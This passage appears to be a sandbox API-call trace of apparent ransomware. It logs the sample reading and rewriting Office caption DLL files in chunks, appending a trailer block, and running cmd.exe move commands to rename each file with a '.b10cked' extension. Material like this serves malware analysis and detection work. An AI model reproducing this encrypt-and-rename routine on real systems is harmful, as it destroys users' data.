SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1a360 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.849] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd1af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd1af, lpOverlapped=0x0) returned 1 [0157.896] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.896] WriteFile (in: hFile=0x114, lpBuffer=0x125a3a8*, nNumberOfBytesToWrite=0xd1af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a3a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd1af, lpOverlapped=0x0) returned 1 [0157.896] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53679, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd1b1 [0157.896] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd1af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd1af, lpOverlapped=0x0) returned 1 [0157.897] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53679, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd1b1 [0157.897] WriteFile (in: hFile=0x114, lpBuffer=0x125a3a8*, nNumberOfBytesToWrite=0xd1af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a3a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd1af, lpOverlapped=0x0) returned 1 [0157.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.902] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0157.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1a360 [0157.902] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0157.902] CloseHandle (hObject=0x114) returned 1 [0157.904] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX") returned 0x3c [0157.904] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0157.905] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xe1c, dwThreadId=0xe70)) returned 1 [0157.926] CloseHandle (hObject=0x1b4) returned 1 [0157.926] CloseHandle (hObject=0x114) returned 1 [0157.926] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.926] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.926] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.926] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.926] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.927] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.927] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.927] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 
[0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.064] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21485345998) returned 1 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 
[0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x8dc78 [0158.066] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.077] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8e160 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8e160 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.078] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.090] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.090] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.111] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) 
returned 0x0 [0158.111] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.111] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.111] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.112] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0158.112] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.153] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.154] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0158.156] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) 
returned 1 [0158.156] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.156] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e160 [0158.157] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.157] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.157] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.158] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e160 [0158.158] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.158] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) 
returned 1 [0158.159] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0158.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0158.164] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8e160 [0158.164] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.164] CloseHandle (hObject=0x114) returned 1 [0158.170] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX") returned 0x3c [0158.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.172] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf5c, dwThreadId=0xe9c)) returned 1 [0158.174] CloseHandle (hObject=0x1b4) returned 1 [0158.174] CloseHandle (hObject=0x114) returned 1 [0158.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.174] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.174] ReleaseMutex (hMutex=0xf8) returned 1 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.174] ReleaseMutex (hMutex=0xf8) returned 1 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 
[0158.174] ReleaseMutex (hMutex=0xf8) returned 1 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.175] ReleaseMutex (hMutex=0xf8) returned 1 [0158.175] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.175] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21496452834) returned 1 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 